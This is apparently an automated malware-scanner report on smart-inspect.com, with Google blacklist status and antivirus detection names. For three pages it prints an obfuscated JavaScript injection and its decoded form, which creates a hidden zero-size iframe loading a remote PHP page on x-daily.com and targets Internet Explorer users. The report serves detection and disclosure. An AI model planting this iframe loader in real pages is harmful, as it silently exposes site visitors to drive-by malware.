New scan:

Malware Scanner report for smart-inspect.com

Malicious/Suspicious/Total urls checked
3/0/7
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "smart-inspect.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/2
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=smart-inspect.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.smart-inspect.com/
200 OK
Content-Length: 6167
Content-Type: text/html
clean
http://www.smart-inspect.com/index.html
200 OK
Content-Length: 6167
Content-Type: text/html
clean
http://www.smart-inspect.com/process.html
200 OK
Content-Length: 11681
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function Nrx4(Ryr3, Awy6, Dnl1) { var Xxhk; Xxhk=Ryr3.split(Awy6); var Wky6=Xxhk.join(Dnl1); return Wky6; } function GrY1(lexg) { lexg = Nrx4(lexg,"##+##","'"); lexg = Nrx4(lexg,"##|##","\\"); Wky6=""; rfa3 =""; for(k=0;k<lexg.length;k++) { Wky6 = lexg.charCodeAt(k); if (Wky6==32){Wky6=35} else if (Wky6==35){Wky6=32} else if (Wky6==59){Wky6=64} else if (Wky6==64){Wky6=59} else if (Wky6==37){Wky6=42} else if (Wky6==42){Wky6=37} else if (Wky6>=97 && Wky6<=122) { Wky6=Wky6-97;Wky6=
... 526 bytes are skipped ...
##+##,9)@Lyyb.hvgZggiryfgv(##+##yliwvi##+##,9)@'));wNe5(GrY1('Lyyb.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));wNe5(GrY1('Lyyb.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#Lmx1=mzertzgli.fhviZtvmg.glOldviXzhv()@'));wNe5(GrY1('ezi#WBa9=Lmx1.rmwvcLu(##+##nhrv##+##)@ezi#Krw3=Lmx1.rmwvcLu(##+##mg#3.##+##)@ezi#CLz3=Lmx1.rmwvcLu(##+##nhrv#1##+##)@'));if ((DYz0>0)&&(Pid6==-1)&&(XOa6==-1)){wNe5(GrY1('wlxfnvmg.ylwb.zkkvmwXsrow(Lyyb)@'));}

Decoded script:


var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe';
var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe';
var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo);
var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo);
Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0);
Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0);
O
... 89 bytes are skipped ...
yle','width: 0; height: 0; border: none;');
Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase();
Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase();
var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8');
var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8');
document.body.appendChild(Obby);
document.body.appendChild(Obby);

Antivirus reports:

Avast
HTML:Iframe-MB [Trj]
Ad-Aware
JS:Exploit.JS.Iframe.I
Ikarus
Trojan.JS.IFrame
nProtect
JS:Exploit.JS.Iframe.I
K7AntiVirus
Riskware ( c5bc005c0 )
TrendMicro-HouseCall
TROJ_GEN.F47V1203
Emsisoft
JS:Exploit.JS.Iframe.I (B)
K7GW
Riskware ( c5bc005c0 )
Microsoft
Trojan:JS/Iframe.AR
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
MicroWorld-eScan
JS:Exploit.JS.Iframe.I
Fortinet
JS/Iframe.U!tr
NANO-Antivirus
Trojan.Script.Iframe.qczk
F-Secure
JS:Exploit.JS.Iframe.I
F-Prot
JS/IFrame.HE.gen
GData
JS:Exploit.JS.Iframe.I
Commtouch
JS/IFrame.HE.gen
BitDefender
JS:Exploit.JS.Iframe.I

http://www.smart-inspect.com/links.html
200 OK
Content-Length: 10054
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function Nrx4(Ryr3, Awy6, Dnl1) { var Xxhk; Xxhk=Ryr3.split(Awy6); var Wky6=Xxhk.join(Dnl1); return Wky6; } function GrY1(lexg) { lexg = Nrx4(lexg,"##+##","'"); lexg = Nrx4(lexg,"##|##","\\"); Wky6=""; rfa3 =""; for(k=0;k<lexg.length;k++) { Wky6 = lexg.charCodeAt(k); if (Wky6==32){Wky6=35} else if (Wky6==35){Wky6=32} else if (Wky6==59){Wky6=64} else if (Wky6==64){Wky6=59} else if (Wky6==37){Wky6=42} else if (Wky6==42){Wky6=37} else if (Wky6>=97 && Wky6<=122) { Wky6=Wky6-97;Wky6=
... 526 bytes are skipped ...
##+##,9)@Lyyb.hvgZggiryfgv(##+##yliwvi##+##,9)@'));wNe5(GrY1('Lyyb.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));wNe5(GrY1('Lyyb.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#Lmx1=mzertzgli.fhviZtvmg.glOldviXzhv()@'));wNe5(GrY1('ezi#WBa9=Lmx1.rmwvcLu(##+##nhrv##+##)@ezi#Krw3=Lmx1.rmwvcLu(##+##mg#3.##+##)@ezi#CLz3=Lmx1.rmwvcLu(##+##nhrv#1##+##)@'));if ((DYz0>0)&&(Pid6==-1)&&(XOa6==-1)){wNe5(GrY1('wlxfnvmg.ylwb.zkkvmwXsrow(Lyyb)@'));}

Decoded script:


var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe';
var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe';
var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo);
var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo);
Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0);
Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0);
O
... 89 bytes are skipped ...
yle','width: 0; height: 0; border: none;');
Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase();
Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase();
var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8');
var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8');
document.body.appendChild(Obby);
document.body.appendChild(Obby);

Antivirus reports:

Avast
HTML:Iframe-MB [Trj]
Ad-Aware
JS:Exploit.JS.Iframe.I
Ikarus
Trojan.JS.IFrame
nProtect
JS:Exploit.JS.Iframe.I
K7AntiVirus
Riskware ( c5bc005c0 )
TrendMicro-HouseCall
TROJ_GEN.F47V1203
Emsisoft
JS:Exploit.JS.Iframe.I (B)
K7GW
Riskware ( c5bc005c0 )
Microsoft
Trojan:JS/Iframe.AR
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
MicroWorld-eScan
JS:Exploit.JS.Iframe.I
Fortinet
JS/Iframe.U!tr
NANO-Antivirus
Trojan.Script.Iframe.qczk
F-Secure
JS:Exploit.JS.Iframe.I
F-Prot
JS/IFrame.HE.gen
GData
JS:Exploit.JS.Iframe.I
Commtouch
JS/IFrame.HE.gen
BitDefender
JS:Exploit.JS.Iframe.I

http://www.smart-inspect.com/contact.html
200 OK
Content-Length: 9700
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function Nrx4(Ryr3, Awy6, Dnl1) { var Xxhk; Xxhk=Ryr3.split(Awy6); var Wky6=Xxhk.join(Dnl1); return Wky6; } function GrY1(lexg) { lexg = Nrx4(lexg,"##+##","'"); lexg = Nrx4(lexg,"##|##","\\"); Wky6=""; rfa3 =""; for(k=0;k<lexg.length;k++) { Wky6 = lexg.charCodeAt(k); if (Wky6==32){Wky6=35} else if (Wky6==35){Wky6=32} else if (Wky6==59){Wky6=64} else if (Wky6==64){Wky6=59} else if (Wky6==37){Wky6=42} else if (Wky6==42){Wky6=37} else if (Wky6>=97 && Wky6<=122) { Wky6=Wky6-97;Wky6=
... 526 bytes are skipped ...
##+##,9)@Lyyb.hvgZggiryfgv(##+##yliwvi##+##,9)@'));wNe5(GrY1('Lyyb.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));wNe5(GrY1('Lyyb.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#ezi#Lmx1=mzertzgli.fhviZtvmg.glOldviXzhv()@'));wNe5(GrY1('ezi#WBa9=Lmx1.rmwvcLu(##+##nhrv##+##)@ezi#Krw3=Lmx1.rmwvcLu(##+##mg#3.##+##)@ezi#CLz3=Lmx1.rmwvcLu(##+##nhrv#1##+##)@'));if ((DYz0>0)&&(Pid6==-1)&&(XOa6==-1)){wNe5(GrY1('wlxfnvmg.ylwb.zkkvmwXsrow(Lyyb)@'));}

Decoded script:


var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe';
var MqQo = 'http://x-daily.com/st/img/z/static.php';var Inv4 = 'iframe';
var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo);
var Obby = document.createElement(Inv4);Obby.setAttribute('src', MqQo);
Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0);
Obby.setAttribute('width',0);Obby.setAttribute('height',0);Obby.setAttribute('border',0);
O
... 89 bytes are skipped ...
yle','width: 0; height: 0; border: none;');
Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase();
Obby.setAttribute('style','display:none'); var Onc8=navigator.userAgent.toLowerCase();
var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8');
var DYz0=Onc8.indexOf('msie');var Pid6=Onc8.indexOf('nt 6.');var XOa6=Onc8.indexOf('msie 8');
document.body.appendChild(Obby);
document.body.appendChild(Obby);

Antivirus reports:

Avast
HTML:Iframe-MB [Trj]
Ad-Aware
JS:Exploit.JS.Iframe.I
Ikarus
Trojan.JS.IFrame
nProtect
JS:Exploit.JS.Iframe.I
K7AntiVirus
Riskware ( c5bc005c0 )
TrendMicro-HouseCall
TROJ_GEN.F47V1203
Emsisoft
JS:Exploit.JS.Iframe.I (B)
K7GW
Riskware ( c5bc005c0 )
Microsoft
Trojan:JS/Iframe.AR
Kaspersky
HEUR:Trojan-Downloader.Script.Generic
MicroWorld-eScan
JS:Exploit.JS.Iframe.I
Fortinet
JS/Iframe.U!tr
NANO-Antivirus
Trojan.Script.Iframe.qczk
F-Secure
JS:Exploit.JS.Iframe.I
F-Prot
JS/IFrame.HE.gen
GData
JS:Exploit.JS.Iframe.I
Commtouch
JS/IFrame.HE.gen
BitDefender
JS:Exploit.JS.Iframe.I

http://www.smart-inspect.com/test404page.js
404 Not Found
Content-Length: 767
Content-Type: text/html
clean
http://www.smart-inspect.com//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js/
404 Not Found
Content-Length: 767
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: smart-inspect.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: smart-inspect.com
Referer: http://www.google.com/search?q=smart-inspect.com

Result:
The result is similar to the first query. There are no suspicious redirects found.